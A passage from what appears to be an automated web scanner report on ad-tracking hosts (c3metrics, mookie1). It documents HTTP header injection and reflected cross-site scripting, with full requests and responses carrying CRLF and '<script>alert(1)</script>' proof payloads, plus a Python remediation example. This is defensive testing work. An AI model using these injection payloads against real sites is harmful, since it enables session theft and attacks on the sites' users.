Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560264|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955464^1304957264|88780
eb91e55787
^1304955464^1304957264; path=/; expires=Mon, 09-May-11 16:07:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracker.bidder7.mookie1.com
Path:   /tr-goog

Issue detail

The value of the u request parameter is copied into the Location response header. The payload 6e5e5%0d%0a801dc7ecf54 was submitted in the u parameter. This caused a response containing an injected HTTP header.

Request

GET /tr-goog?a=4a155dda-808a-4648-a03d-f65de2ef0ada&b=1&c=10000205&p=TcgKZwADi9IK5X3Oj51wI1CQKxG3GyqHp1s3QA&u=6e5e5%0d%0a801dc7ecf54&z=-06:00&x=rtbbid2us2 HTTP/1.1
Host: tracker.bidder7.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://matcher.bidder7.mookie1.com/tracker?eid=google&id=6e5e5
801dc7ecf54

Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2. Cross-site scripting (reflected)
There are 162 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (a numeric id such as cid=480 should only ever be a short run of digits); and user input should be encoded at any point where it is copied into application responses, replacing all HTML metacharacters, including < > " ' and =, with the corresponding HTML entities. The encoding must match the context the value lands in: the c3metrics instances below write the value into a JavaScript string literal (c3VJScid='...') rather than into element text, so that context needs JavaScript string escaping in addition to, or instead of, HTML entity encoding.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
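
As an added example (not from the original report or from c3metrics), the two layers applied to the sink seen in instances 2.1 to 2.3, where the parameter value is written into a JavaScript string literal in a body served as text/html. The allow-list for cid assumes the parameter is always a short numeric id, as it is on this page; the one-line response template is a simplified stand-in for the real script.

```python
import re
from html import escape

# Value reflected in instance 2.1 (cid parameter). The sink on the page is
#   this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='<value>';
# inside a response served with Content-Type: text/html.
PAYLOAD = "480d7ecd<script>alert(1)</script>81cab84367b"

# Assumption: cid is a short numeric id (it is 480 everywhere on this page).
CID_RE = re.compile(r"^[0-9]{1,10}$")


def is_valid_cid(cid: str) -> bool:
    """Layer 1, allow-list validation on arrival: accept only what the
    parameter is expected to carry and reject everything else outright,
    instead of trying to strip dangerous characters out of bad input."""
    return CID_RE.match(cid) is not None


def html_encode(s: str) -> str:
    """Layer 2 for an HTML text or attribute context: every metacharacter the
    remediation lists (< > " ' and =) becomes an entity."""
    return escape(s, quote=True).replace("=", "&#x3D;")


def js_string_escape(s: str) -> str:
    """Layer 2 for the context actually seen in 2.1-2.3, a JavaScript string
    literal: hex-escape everything outside a small safe set, so neither the
    quote delimiter, a newline, nor a '</script>' sequence can end the literal
    or the script, whether the body is parsed as script or as HTML."""
    def esc(m):
        cp = ord(m.group())
        return "\\x%02x" % cp if cp < 0x100 else "\\u%04x" % cp
    return re.sub(r"[^A-Za-z0-9 ,._-]", esc, s)


def render_vulnerable(cid: str) -> str:
    """Raw concatenation, as in the report's responses."""
    return "this.c3VJS.c3VJScid='" + cid + "';"


def render_hardened(cid: str) -> str:
    """Both layers together: reject malformed input, then encode for the
    JavaScript string context before the value is written to the response."""
    if not is_valid_cid(cid):
        raise ValueError("cid must be numeric")
    return "this.c3VJS.c3VJScid='" + js_string_escape(cid) + "';"


def breaks_out(body: str) -> bool:
    """Does a script tag survive into the output? True means an HTML parse of
    the body would execute it, which is what the report's alert(1) proves."""
    low = body.lower()
    return "<script" in low or "</script" in low


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("encoded only:", "x='" + js_string_escape(PAYLOAD) + "'")
    print("valid cid:", render_hardened("480"))
```

Pick the encoder by the context the value lands in. HTML entity encoding on its own would keep the `<script>` tag from being parsed as markup, but it leaves backslashes and line breaks untouched, and those are exactly the characters that matter inside a JavaScript string literal; the hex-escaping form above neutralises both parses at once.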


2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload d7ecd<script>alert(1)</script>81cab84367b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

In the response body the value sits inside a JavaScript string literal (c3VJScid='...'), but because the body is served with Content-Type: text/html, a browser that navigates to the URL parses it as HTML and executes the injected script element. The same value is also reflected unencoded into the names of the three Set-Cookie headers in the response, so the parameter reaches a header sink as well as the body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480d7ecd<script>alert(1)</script>81cab84367b&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-SM=adver_05-09-2011-15-39-03; expires=Thu, 12-May-2011 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-VT=adver_05-09-2011-15-39-03_2045387061304955543; expires=Sat, 07-May-2016 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-nUID=adver_2045387061304955543; expires=Mon, 09-May-2011 15:54:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480d7ecd<script>alert(1)</script>81cab84367b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='2045387061304955543';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 58083<script>alert(1)</script>960a71f01f2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver58083<script>alert(1)</script>960a71f01f2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989ZZZZadver58083%3Cscript%3Ealert%281%29%3C%2Fscript%3E960a71f01f2_05-09-2011-15-39-03_5915877131304955543; expires=Sat, 07-May-2016 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10650526691304954989ZZZZadver58083%3Cscript%3Ealert%281%29%3C%2Fscript%3E960a71f01f2_5915877131304955543; expires=Mon, 09-May-2011 15:54:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver58083<script>alert(1)</script>960a71f01f2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='591587713130495
...[SNIP]...

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6efef<script>alert(1)</script>ef0d23f8ba8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/6efef<script>alert(1)</script>ef0d23f8ba8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:06 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-06_3915341321304955546; expires=Sat, 07-May-2016 15:39:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3915341321304955546; expires=Mon, 09-May-2011 15:54:06 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='3915341321304955546';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/6efef<script>alert(1)</script>ef0d23f8ba8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 83150<script>alert(1)</script>ef603f8fccd was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=83150<script>alert(1)</script>ef603f8fccd&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-04_17462808071304955544; expires=Sat, 07-May-2016 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17462808071304955544; expires=Mon, 09-May-2011 15:54:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17462808071304955544';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='83150<script>alert(1)</script>ef603f8fccd';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 4a309<script>alert(1)</script>ebde3e6b103 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=724a309<script>alert(1)</script>ebde3e6b103&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Wed, 08-Jun-2011 19:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-04_8048716101304955544; expires=Sat, 07-May-2016 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_8048716101304955544; expires=Mon, 09-May-2011 15:54:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8048716101304955544';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='724a309<script>alert(1)</script>ebde3e6b103';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 850d8<script>alert(1)</script>2b3d55e9cdd was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=850d8<script>alert(1)</script>2b3d55e9cdd&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
